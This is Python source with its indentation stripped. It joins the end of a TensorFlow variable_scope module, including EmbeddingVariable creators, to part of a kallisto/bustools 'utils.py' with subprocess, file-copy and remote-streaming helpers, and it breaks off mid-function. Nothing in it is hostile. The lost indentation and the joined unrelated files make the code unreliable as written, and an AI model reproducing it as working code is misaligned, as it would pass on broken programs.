def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def _get_custom_getter(self, dtype):
"""Returns a custom getter that this class's methods must be called under.
All methods of this class must be called under a variable scope that was
passed this custom getter. Example:
```python
network = ConvNetBuilder(...)
with tf.compat.v1.variable_scope('cg',
custom_getter=network.get_custom_getter()):
network.conv(...)
# Call more methods of network here
```
Currently, this custom getter only does anything if self.use_tf_layers is
True. In that case, it causes variables to be stored as dtype
self.variable_type, then casted to the requested dtype, instead of directly
storing the variable as the requested dtype.
"""
def inner_custom_getter(getter, *args, **kwargs):
"""Custom getter that forces variables to have type self.variable_type."""
cast_to_bfloat16 = False
requested_dtype = kwargs['dtype']
if requested_dtype == dtypes.bfloat16:
# Only change the variable dtype if doing so does not decrease variable
# precision.
kwargs['dtype'] = dtype
cast_to_bfloat16 = True
var = getter(*args, **kwargs)
# This if statement is needed to guard the cast, because batch norm
# assigns directly to the return value of this custom getter. The cast
# makes the return value not a variable so it cannot be assigned. Batch
# norm variables are always in fp32 so this if statement is never
# triggered for them.
if cast_to_bfloat16:
index = var.name.rfind(':')
if index != -1: # found
cast_name = var.name[:index] + '/cast'
var = math_ops.cast(var, dtypes.bfloat16, name=cast_name)
else:
var = math_ops.cast(var, dtypes.bfloat16)
return var
return inner_custom_getter
def keep_weights(self, dtype=dtypes.float32):
"""Scope class for bfloat16 variables so that the model uses custom getter.
This enables variables to be read as bfloat16 type when using get_variable.
```python
import tensorflow as tf
from tensorflow.contrib import layers
with tf.variable_scope(...).keep_weights(dtype=tf.float32):
data_bf16 = tf.cast(data, dtype=tf.bfloat16)
matmul_0 = tf.layers.dense(data_bf16, 64, activation=tf.nn.relu)
matmul_0 = tf.layers.batch_normalization(matmul_0, training=True)
matmul_0 = tf.cast(matmul_0, dtype=tf.float32)
matmul_1 = layers.fully_connected(data_bf16, 128,
activation_fn=tf.nn.leaky_relu)
matmul_1 = tf.cast(matmul_1, dtype=tf.float32)
```
"""
self._custom_getter = self._get_custom_getter(dtype=dtype)
return self
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
try:
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
try:
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg,
traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
embedding_block_num=kwargs.get("embedding_block_num", None),
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
invalid_key = kwargs.get("invalid_key", None)
evconfig = kwargs.get("evconfig", None)
initializer = kwargs.get("embedding_initializer", None)
ht_partition_num = kwargs.get("ht_partition_num", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource and invalid_key is None:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
elif use_resource and invalid_key is not None:
emb_blocknum = embedding_block_num[0]
if emb_blocknum is None:
ev = kv_variable_ops.EmbeddingVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope, invalid_key=invalid_key,
evconfig=evconfig,
initializer=initializer, ht_partition_num=ht_partition_num)
if evconfig.init_data_source is not None:
ev.set_init_data_source_initializer(evconfig.init_data_source)
return ev
else:
evconfig.block_num = emb_blocknum
evlist = []
block_evconfig = copy.copy(evconfig)
block_evconfig.handle_name = name
block_evconfig.emb_index = 0
primary_ev = kv_variable_ops.EmbeddingVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name + "/block0", dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope, invalid_key=invalid_key,
evconfig=block_evconfig,
initializer=initializer, ht_partition_num=ht_partition_num)
if evconfig.init_data_source is not None:
primary_ev.set_init_data_source_initializer(evconfig.init_data_source)
evlist.append(primary_ev)
block_evconfig.primary = primary_ev
with ops.colocate_with(primary_ev):
block_evconfig.handle_name = primary_ev._block_handle_name
for i in range(emb_blocknum - 1):
slave_evconfig = copy.copy(block_evconfig)
slave_evconfig.emb_index = i + 1
slave_evconfig.primary_slotnum_op = primary_ev._slotnum_op
slave_ev = kv_variable_ops.EmbeddingVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name + "/block" + str(i + 1), dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope, invalid_key=invalid_key,
evconfig=slave_evconfig,
initializer=initializer, ht_partition_num=ht_partition_num)
if evconfig.init_data_source is not None:
slave_ev._set_init_data_source_initializer(evconfig.init_data_source)
evlist.append(slave_ev)
dyn_ev = kv_variable_ops.DynamicEmbeddingVariable(name, evlist)
return dyn_ev
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
utils.py | import concurrent.futures
import logging
import os
import re
import shutil
import subprocess as sp
import threading
import time
from urllib.request import urlretrieve
import anndata
import ngs_tools as ngs
import pandas as pd
import scipy.io
from scipy import sparse
from tqdm import tqdm
from .config import (
get_bustools_binary_path,
get_kallisto_binary_path,
PLATFORM,
TECHNOLOGIES_MAPPING,
UnsupportedOSException,
)
from .dry import dryable
from .dry import utils as dry_utils
from .logging import logger
from .stats import STATS
TECHNOLOGY_PARSER = re.compile(r'^(?P<name>\S+)')
VERSION_PARSER = re.compile(r'^\S*? ([0-9]+).([0-9]+).([0-9]+)')
# These functions have been moved as of 0.26.1 to the ngs_tools library but are
# imported from this file in other places. For now, let's keep these here.
# TODO: remove these
open_as_text = ngs.utils.open_as_text
decompress_gzip = ngs.utils.decompress_gzip
compress_gzip = ngs.utils.compress_gzip
concatenate_files = ngs.utils.concatenate_files_as_text
download_file = ngs.utils.download_file
get_temporary_filename = dryable(dry_utils.get_temporary_filename)(
ngs.utils.mkstemp
)
class NotImplementedException(Exception):
pass
class UnmetDependencyException(Exception):
pass
class TqdmLoggingHandler(logging.Handler):
"""Custom logging handler so that logging does not affect progress bars.
"""
def __init__(self, level=logging.NOTSET):
super().__init__(level)
def emit(self, record):
try:
msg = self.format(record)
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.handleError(record)
def update_filename(filename, code):
"""Update the provided path with the specified code.
For instance, if the `path` is 'output.bus' and `code` is `s` (for sort),
this function returns `output.s.bus`.
:param filename: filename (NOT path)
:type filename: str
:param code: code to append to filename
:type code: str
:return: path updated with provided code
:rtype: str
"""
name, extension = os.path.splitext(filename)
return f'{name}.{code}{extension}'
@dryable(dry_utils.make_directory)
def make_directory(path):
"""Quietly make the specified directory (and any subdirectories).
This function is a wrapper around os.makedirs. It is used so that
the appropriate mkdir command can be printed for dry runs.
:param path: path to directory to make
:type path: str
"""
os.makedirs(path, exist_ok=True)
@dryable(dry_utils.remove_directory)
def remove_directory(path):
"""Quietly make the specified directory (and any subdirectories).
This function is a wrapper around shutil.rmtree. It is used so that
the appropriate rm command can be printed for dry runs.
:param path: path to directory to remove
:type path: str
"""
shutil.rmtree(path, ignore_errors=True)
@dryable(dry_utils.run_executable)
def run_executable(
command,
stdin=None,
stdout=sp.PIPE,
stderr=sp.PIPE,
wait=True,
stream=True,
quiet=False,
returncode=0,
alias=True,
record=True,
):
"""Execute a single shell command.
:param command: a list representing a single shell command
:type command: list
:param stdin: object to pass into the `stdin` argument for `subprocess.Popen`,
defaults to `None`
:type stdin: stream, optional
:param stdout: object to pass into the `stdout` argument for `subprocess.Popen`,
defaults to `subprocess.PIPE`
:type stdout: stream, optional
:param stderr: object to pass into the `stderr` argument for `subprocess.Popen`,
defaults to `subprocess.PIPE`
:type stderr: stream, optional
:param wait: whether to wait until the command has finished, defaults to `True`
:type wait: bool, optional
:param stream: whether to stream the output to the command line, defaults to `True`
:type stream: bool, optional
:param quiet: whether to not display anything to the command line and not check the return code,
defaults to `False`
:type quiet: bool, optional
:param returncode: the return code expected if the command runs as intended,
defaults to `0`
:type returncode: int, optional
:param alias: whether to use the basename of the first element of `command`,
defaults to `True`
:type alias: bool, optional
:param record: whether to record the call statistics, defaults to `True`
:type record: bool, optional
:return: the spawned process
:rtype: subprocess.Process
"""
command = [str(c) for c in command]
c = command.copy()
if alias:
c[0] = os.path.basename(c[0])
if not quiet:
logger.debug(' '.join(c))
if not wait and record:
STATS.command(c)
start = time.time()
p = sp.Popen(
command,
stdin=stdin,
stdout=stdout,
stderr=stderr,
universal_newlines=wait,
bufsize=1 if wait else -1,
)
# Wait if desired.
if wait:
out = []
while p.poll() is None:
if stream and not quiet:
for line in p.stdout:
out.append(line.strip())
logger.debug(line.strip())
for line in p.stderr:
out.append(line.strip())
logger.debug(line.strip())
if record:
STATS.command(c, runtime=time.time() - start)
if not quiet and p.returncode != returncode:
logger.error('\n'.join(out))
raise sp.CalledProcessError(p.returncode, ' '.join(command))
return p
def get_kallisto_version():
"""Get the provided Kallisto version.
This function parses the help text by executing the included Kallisto binary.
:return: tuple of major, minor, patch versions
:rtype: tuple
"""
p = run_executable([get_kallisto_binary_path()],
quiet=True,
returncode=1,
record=False)
match = VERSION_PARSER.match(p.stdout.read())
return tuple(int(ver) for ver in match.groups()) if match else None
def get_bustools_version():
"""Get the provided Bustools version.
This function parses the help text by executing the included Bustools binary.
:return: tuple of major, minor, patch versions
:rtype: tuple
"""
p = run_executable([get_bustools_binary_path()],
quiet=True,
returncode=1,
record=False)
match = VERSION_PARSER.match(p.stdout.read())
return tuple(int(ver) for ver in match.groups()) if match else None
def parse_technologies(lines):
"""Parse a list of strings into a list of supported technologies.
This function parses the technologies printed by running `kallisto bus --list`.
:param lines: the output of `kallisto bus --list` split into lines
:type lines: list
:return: list of technologies
:rtype: list
"""
parsing = False
technologies = set()
for line in lines:
if line.startswith('-'):
parsing = True
continue
if parsing:
if line.isspace():
break
match = TECHNOLOGY_PARSER.match(line)
if match:
technologies.add(match['name'])
return technologies
def get_supported_technologies():
"""Runs 'kallisto bus --list' to fetch a list of supported technologies.
:return: list of technologies
:rtype: list
"""
p = run_executable([get_kallisto_binary_path(), 'bus', '--list'],
quiet=True,
returncode=1,
record=False)
return parse_technologies(p.stdout)
def whitelist_provided(technology):
"""Determine whether or not the whitelist for a technology is provided.
:param technology: the name of the technology
:type technology: str
:return: whether the whitelist is provided
:rtype: bool
"""
upper = technology.upper()
return upper in TECHNOLOGIES_MAPPING and TECHNOLOGIES_MAPPING[
upper].chemistry.has_whitelist
@dryable(dry_utils.move_file)
def move_file(source, destination):
"""Move a file from source to destination, overwriting the file if the
destination exists.
:param source: path to source file
:type source: str
:param destination: path to destination
:type destination: str
:return: path to moved file
:rtype: str
"""
shutil.move(source, destination)
return destination
@dryable(dry_utils.copy_whitelist)
def copy_whitelist(technology, out_dir):
"""Copies provided whitelist for specified technology.
:param technology: the name of the technology
:type technology: str
:param out_dir: directory to put the whitelist
:type out_dir: str
:return: path to whitelist
:rtype: str
"""
technology = TECHNOLOGIES_MAPPING[technology.upper()]
archive_path = technology.chemistry.whitelist_path
whitelist_path = os.path.join(
out_dir,
os.path.splitext(os.path.basename(archive_path))[0]
)
with open_as_text(archive_path, 'r') as f, open(whitelist_path, 'w') as out:
out.write(f.read())
return whitelist_path
@dryable(dry_utils.copy_map)
def copy_map(technology, out_dir):
"""Copies provided feature-to-cell barcode mapping for the speified technology.
:param technology: the name of the technology
:type technology: str
:param out_dir: directory to put the map
:type out_dir: str
:return: path to map
:rtype: str
"""
technology = TECHNOLOGIES_MAPPING[technology.upper()]
archive_path = technology.chemistry.feature_map_path
map_path = os.path.join(
out_dir,
os.path.splitext(os.path.basename(archive_path))[0]
)
with open_as_text(archive_path, 'r') as f, open(map_path, 'w') as out:
out.write(f.read())
return map_path
@dryable(dry_utils.stream_file)
def stream_file(url, path):
"""Creates a FIFO file to use for piping remote files into processes.
This function spawns a new thread to download the remote file into a FIFO
file object. FIFO file objects are only supported on unix systems.
:param url: url to the file
:type url: str
:param path: path to place FIFO file
:type path: str
:raises UnsupportedOSException: if the OS is Windows
:return: path to FIFO file
:rtype: str
"""
# Windows does not support FIFO files.
if PLATFORM == 'windows':
raise UnsupportedOSException((
'Windows does not support piping remote files.'
'Please download the file manually.'
))
else:
logger.info('Piping {} to {}'.format(url, path))
os.mkfifo(path)
t = threading.Thread(target=urlretrieve, args=(url, path), daemon=True)
t.start()
return path
def read_t2g(t2g_path):
"""Given a transcript-to-gene mapping path, read it into a dictionary.
The first column is always assumed to tbe the transcript IDs.
:param t2g_path: path to t2g
:type t2g_path: str
:return: dictionary containing transcript IDs as keys and all other columns
as a tuple as values
:rtype: dict
"""
t2g = {}
with open_as_text(t2g_path, 'r') as f:
for line in f:
if line.isspace():
continue
split = line.strip().split('\t')
transcript = split[0]
other = tuple(split[1:])
if transcript in t2g:
logger.warning(
f'Found duplicate entries for {transcript} in {t2g_path}. '
'Earlier entries will be ignored.'
)
t2g[transcript] = other
return t2g
def import_tcc_matrix_as_anndata(
matrix_path, barcodes_path, ec_path, txnames_path, threads=8
):
"""Import a TCC matrix as an Anndata object.
:param matrix_path: path to the matrix ec file
:type matrix_path: str
:param barcodes_path: path to the barcodes txt file
:type barcodes_path: str
:param genes_path: path to the ec txt file
:type genes_path: str
:param txnames_path: path to transcripts.txt generated by `kallisto bus`
:type txnames_path: str
:return: a new Anndata object
:rtype: anndata.Anndata
"""
df_barcodes = pd.read_csv(
barcodes_path, index_col=0, header=None, names=['barcode']
)
df_ec = pd.read_csv(
ec_path,
index_col=0,
header=None,
names=['ec', 'transcripts'],
sep='\t',
dtype=str
)
df_ec.index = df_ec.index.astype(str) # To prevent logging from anndata
with open(txnames_path, 'r') as f:
transcripts = [
line.strip() for line in f.readlines() if not line.strip().isspace()
]
